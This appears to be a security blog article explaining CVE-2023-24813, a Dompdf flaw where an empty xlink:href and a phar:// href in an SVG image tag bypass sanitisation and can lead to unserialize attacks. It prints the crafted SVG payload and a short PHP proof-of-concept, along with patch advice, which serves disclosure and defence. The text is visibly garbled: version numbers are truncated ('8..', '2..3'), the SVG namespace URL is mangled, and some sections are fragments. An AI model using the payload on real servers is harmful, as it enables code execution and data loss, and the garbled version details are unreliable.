Summary:
Dompdf is a popular open source library for converting HTML to PDF using PHP. In February 2023, security researchers discovered a critical vulnerability (CVE-2023-24813) in how Dompdf handles SVG image tags. This flaw allows attackers to call arbitrary URLs via specially crafted SVGs — and in some cases, can result in file deletion, information leakage, or even remote code execution (RCE) on vulnerable servers. This article provides a clear explanation, an example exploit, and actionable advice.
Understanding the Vulnerability
What’s affected?
Using PHP versions before 8.. is especially dangerous as it can lead to unserialize exploits
Root cause:
The bug arises due to inconsistent handling of SVG <image> tag attributes between Dompdf and its dependency, php-svg-lib. Here’s how it works:
- When you use an SVG like <image xlink:href="..." href="...">, *Dompdf* prioritizes xlink:href and tries to sanitize it.
- Meanwhile, php-svg-lib (which later processes the SVG) trusts the href attribute if both are present, and prefers it if xlink:href is empty.
- As a result, it’s possible to sneak past Dompdf’s checks by putting an empty (or benign) xlink:href="" in the tag but a malicious URL in href.
This allows arbitrary (even dangerous) protocols or URLs to be referenced and fetched — defeating built-in protections.
The following SVG snippet illustrates the bypass trick
<svg width="100" height="100"
xmlns="http://www.w3.org/200/svg";
xmlns:xlink="http://www.w3.org/1999/xlink">;
<image xlink:href="" href="phar:///tmp/payload.phar" height="100" width="100"/>
</svg>
Dompdf sees xlink:href as empty and thinks there’s no danger.
- php-svg-lib then falls back to href and will try to load phar:///tmp/payload.phar.
If the targeted PHP version is <8.. (where certain deserialization behaviors are more risky), this can lead to an arbitrary unserialize vulnerability — meaning attacker-controlled object data can be injected, leading to file deletion and potential code execution.
Proof-of-Concept Exploit
Here’s a simple PHP code snippet to demonstrate how the exploit works in an environment running an unpatched Dompdf version:
require 'vendor/autoload.php';
use Dompdf\Dompdf;
$svg = <<<SVG
<svg width="100" height="100"
xmlns="http://www.w3.org/200/svg";
xmlns:xlink="http://www.w3.org/1999/xlink">;
<image xlink:href="" href="phar:///tmp/exploit.phar" height="100" width="100"/>
</svg>
SVG;
// This would normally be user-controlled input
$html = '<html><body>' . $svg . '</body></html>';
$dompdf = new Dompdf();
$dompdf->loadHtml($html);
$dompdf->render(); // This will trigger the exploit
If you are running PHP <8.., and /tmp/exploit.phar is an attacker-controlled payload, this can lead to unserialization of attacker-supplied data.
Remote code execution (RCE) in certain setups
There are NO safe configuration workarounds. Only applying the patch or upgrading can close this hole.
Reported: Early 2023
- Patched in: Commit 95009ea98
- Released in: Dompdf 2..3
Recommendations
If you use Dompdf:
If using PHP <8.., strongly consider upgrading to PHP 8.x as well.
There are no reliable workarounds. Filtering input for <image href=""> is tricky and not future-proof.
References
- Original Advisory on GitHub
- Dompdf Patch Commit
- CVE-2023-24813 at NVD
- OWASP SSRF Explanation
- php-svg-lib
Closing Thoughts
This issue demonstrates how subtle differences between similar libraries (in this case, Dompdf and php-svg-lib's SVG attribute parsing) can introduce high-impact security bugs — even in mature projects. With increasing use of complex HTML-to-PDF generation and third-party templates, always keep your dependencies up to date and watch for code paths (like image tags) that bridge from user input to system calls.
If you run Dompdf in production, patch now and review your audit and update policies regularly!
Stay secure!
If this information saved you headaches, please share it with your developer or security teams.
Timeline
Published on: 02/07/2023 19:15:00 UTC
Last modified on: 02/16/2023 14:53:00 UTC